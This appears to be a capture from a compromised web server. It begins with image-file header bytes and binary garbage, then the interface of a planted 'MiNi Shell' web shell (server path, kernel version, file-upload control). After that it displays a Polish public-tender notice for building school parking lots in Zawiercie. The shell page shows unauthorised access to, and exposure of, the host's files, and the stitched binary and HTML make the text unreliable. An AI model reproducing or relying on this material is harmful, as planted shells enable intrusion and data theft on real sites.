JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210602/0007278801-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00072788 z dnia 2021-06-02</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa parkingów na placu Szkoły Podstawowej Nr 7 w Zawierciu położonej przy ul. Oświatowej 55 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI ZESPÓŁ OBSŁUGI EKONOMICZNO-ADMINISTRACYJNEJ SZKÓŁ W ZAWIERCIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271501887</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ignacego Paderewskiego 49</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zawiercie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">326722903</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mzoeas@mzoeas.zawiercie.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzoeas.zawiercie.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Miejski Zespół Obsługi Ekonomiczno-Administracyjnej Szkół w Zawierciu</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">2715001887</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Paderewskiego 49</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Zawiercie</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">42-400</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">326722903</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">mzoeas@mzoeas.zawiercie.eu</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.mzoeas.zawiercie.eu</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa parkingów na placu Szkoły Podstawowej Nr 7 w Zawierciu położonej przy ul. Oświatowej 55 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4340e539-c392-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00072788</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00067674/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Wykonanie parkingu przy Szkole Podstawowej Nr 7 w Zawierciu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mzoeas-zawiercie.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mzoeas-zawiercie.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający złożyć ofertę (wyłącznie poprzez Platformę przetargową) – zobowiązany jest<br/>zapoznać się z instrukcjami użytkowników Platformy przetargowej - dostępnymi pod adresem<br/>https://mzoeas-zawiercie.logintrade.net/rejestracja/instrukcje.html oraz zaakceptować regulamin korzystania z<br/>Platformy przetargowej dostępny pod adresem:<br/>https://zawiercie.logintrade.net/rejestracja/regulamin.html. 2. Złożenie ofertypoprzez Platformę<br/>przetargową oznacza akceptację regulaminu, o którym mowa w ust. 1 rozdziału SWZ.3.Wymagania<br/>techniczne związane z korzystaniem z Platformy przetargowej –wskazane są na stronie internetowej<br/>Platformy przetargowej - pod adresem:https://mzoeas-zawiercie.logintrade.net/rejestracja/instrukcje.html4.<br/>Wsparcia technicznego w zakresie działania Platformy przetargowej udziela jej dostawca, tj. Logintrade<br/>SA ul. Legnicka57D,lokal B/J,54-203 Wrocław, nr tel. 71 787 35 34, e-mail: helpdesk@logintrade.net<br/>odponiedziałku do piątku (dni robocze) w godz. 800 - 1600.5. Sposoby złożenia oferty za<br/>pośrednictwem Platformy przetargowej oraz potwierdzenia złożenia oferty (w zależności od wyboru<br/>opcji z logowaniem lub bez logowania), zostały opisane w Instrukcjach użytkowników Platformy<br/>przetargowej.6.Oferty,oświadczenia, o których mowa w art. 125 ust. 1 ustawy, podmiotowe środki<br/>dowodowe, w tym oświadczenie, o którym mowa w art.117 ust. 4 ustawy, oraz zobowiązanie podmiotu<br/>udostępniającego zasoby, o którym mowa w art. 118ust. 3 ustawy, zwane dalej „zobowiązaniem<br/>podmiotu udostępniającego zasoby”, przedmiotowe środki dowodowe,pełnomocnictwo, sporządza się<br/>w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art.<br/>18ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania<br/>publiczne (Dz.U. z2020 r. poz. 346, 568, 695, 1517 i2320), z zastrzeżeniem formatów, o których mowa<br/>w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych. Pozostałe wymagania<br/>zgodnie z SWZ</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">www.mzoeas.zawiercie.eu</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27kwietnia 2016r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1 z późn. zm.), dalej „RODO”, informuję, że: administratorem Pani/Pana danych<br/>osobowych jest: Prezydent Miasta Zawiercie – Łukasz Konarski, ul. Leśna 2, 42-400 Zawiercie,<br/>Administrator wyznaczył Inspektora Ochrony Danych - Pana – Michała Furgacz, z którym może się<br/>Pani/Pan skontaktować w sprawach związanych z ochroną danych osobowych w następujący sposób:<br/>e-mail: iod@zawiercie.eu, Tel. 32 494 12 00, Pani/Pana dane osobowe przetwarzane będą na<br/>podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego: ,,Przebudowa nawierzchni ulicy Malinowej w Zawierciu” nr postępowania<br/>WIZP.271.41.2021. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z<br/>dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z 2019 r. poz. 2019 z późn.zm.), dalej<br/>„ustawa Pzp”; Pani/Pana dane osobowe będą przechowywane przez okres, który wyznaczony zostanie<br/>przede wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji<br/>kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie działania archiwów<br/>zakładowych, chyba że przepisy szczególne stanowią inaczej; obowiązek podania przez Panią/Pana<br/>danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp; w odniesieniu do Pani/Pana<br/>danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO; posiada Pani/Pan:• na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>Pani/Pana dotyczących;• na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych(1);• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych (2);• prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>narusza przepisy RODO; nie przysługuje Pani/Panu:• w związku z art. 17 ust. 3 lit. b, d lub e RODO<br/>prawo do usunięcia danych osobowych;• prawo do przenoszenia danych osobowych, o którym mowa w<br/>art. 20 RODO;• na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO.(1) wyjaśnienie: skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować<br/>zmianą wyniku postępowaniao udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.(2) wyjaśnienie: zgodnie z art. 19<br/>ust. 3 ustawy Pzp wystąpienie z zadaniem o którym mowa w art. 18 ust.1 rozporządzenia 2016/679,<br/>nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/>zamówienia publicznego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">121/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres robót obejmuje:<br/>a)	Utwardzenia i parkingi<br/>	rozebranie chodników/utwardzeń 223,00m2;<br/>	wykonanie korytowania o głębokości pow. 20 cm 1474,00m²;<br/>	ręczne profilowanie 1404,98m²;<br/>	krawężniki betonowe 451,00m;<br/>	podbudowa z kruszywa 1404,98m²;<br/>	nawierzchnia z kostki brukowej 422,17m²;<br/>	nawierzchnie z kraty geoSYSTEM G4 982,81m²;<br/><br/>b)	Kanalizacja deszczowa<br/>	wykopy liniowe i jamiste 23,83 m3;<br/>	rurociągi kanalizacyjne z PVC-U 160/4,7mm 26,70m;<br/>	studzienki ściekowe betonowe o śr. 500mm 2 szt<br/><br/>c)	Prace towarzyszące<br/>	wykonanie trawników siewem 184,00m²; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <p class="mb-0">71336000-2 - Dodatkowe usługi inżynieryjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z postanowieniami SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji na przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania przedmiotu zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu, określone przez Zamawiającego zgodnie z art. 112 ust. 2<br/>ustawy. 1) Zdolności do występowania w obrocie gospodarczym: 􀀀 Zamawiający nie formułuje<br/>warunku udziału w postępowaniu w tym zakresie; 2) Uprawnień do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:􀀀 Zamawiający<br/>nie formułuje warunku udziału w postępowaniu w tym zakresie; 3) Sytuacji ekonomicznej lub<br/>finansowej:􀀀 Zamawiający nie formułuje warunku udziału w postępowaniu w tym zakresie;4)<br/>Zdolności technicznej lub zawodowej:a) Wykonawca musi wykazać, iż w okresie ostatnich 5<br/>latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wykonał należycie:􀀀 jedną robotę budowlaną polegającą na budowie<br/>lub przebudowie lub remoncie lub rozbudowie nawierzchni z kostki brukowej lub kształtki<br/>betonowej, o powierzchni min. 250 m2Pojęcia „budowa”, „przebudowa”, „remont”, „rozbudowa”<br/>należy rozumieć zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U.<br/>z 2020 r. poz. 1333 z późn. zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona w celu wykazania braku podstaw (przesłanek)<br/>wykluczenia z postępowania (określonych w ust. 2 niniejszego rozdziału SWZ ), na podstawie art. 274<br/>ust. 1 ustawy zostanie wezwany w terminie nie którtszym niż 5 dni od dnia wezwania do złożenia<br/>następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):a)<br/>oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej<br/>grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>(Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową<br/>lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej<br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty,<br/>oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego<br/>Wykonawcy należącego do tej samej grupy kapitałowej.W przypadku wspólnego ubiegania się o<br/>zamówienie przez Wykonawców, w/w oświadczenie składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie.W przypadku, gdy w postępowaniu wpłynie jedna oferta, Zamawiający<br/>nie będzie wzywał do złożenia w/w oświadczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania<br/>spełniania warunków udziału w postępowaniu (określonych przez Zamawiającego w ust. 3 niniejszego<br/>rozdziału SWZ), na podstawie art. 274 ust. 1 ustawy zostanie wezwany w terminie nie którtszym niż 5<br/>dni od dnia wezwania do złożenia następujących podmiotowych środków dowodowych (aktualnych na<br/>dzień ich złożenia):wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat,<br/>a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>Ogłoszenie nr 2021/BZP 00044734/01 z dnia 2021-04-30<br/>2021-04-30 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie stawia wymogu złożenia wraz z ofertą przedmiotowych środków<br/>dowodowych.2. W przypadku zastosowania materiałów, urządzeń, wyrobów lub rozwiązań<br/>równoważnych, Wykonawca zobowiązany jest do ich wskazania w ofercie oraz do złożenia wraz<br/>z ofertą kart technicznych lub innych dokumentów potwierdzających, że oferowane rozwiązania<br/>równoważne spełniają wymagania Zamawiającego opisane w przedmiocie<br/>zamówienia.JeżeliWykonawca nie złoży ww. dokumentów lub złożone dokumenty będą<br/>niekompletne (nie potwierdzając w ten sposób równoważności oferty w zakresie opisanym w<br/>opisie przedmiotu zamówienia, Zamawiający nie będzie wzywał do ich złożenia/uzupełnienia). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą należy złożyć:1. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, o<br/>niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu,<br/>w zakresie wskazanym w rozdziale V SWZ – zgodnie z załącznikiem nr 2 do SWZ.<br/>Oświadczenia stanowią dowód potwierdzający brak podstaw wykluczenia oraz spełniania<br/>warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący<br/>wymagane przez Zamawiającego podmiotowe środki dowodowe, wskazane w<br/>SWZ.Oświadczenia składa się, pod rygorem nieważności, w formie elektronicznej (w postaci<br/>elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym. Wykonawca w przypadku polegania<br/>na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby<br/>przedstawia wraz z 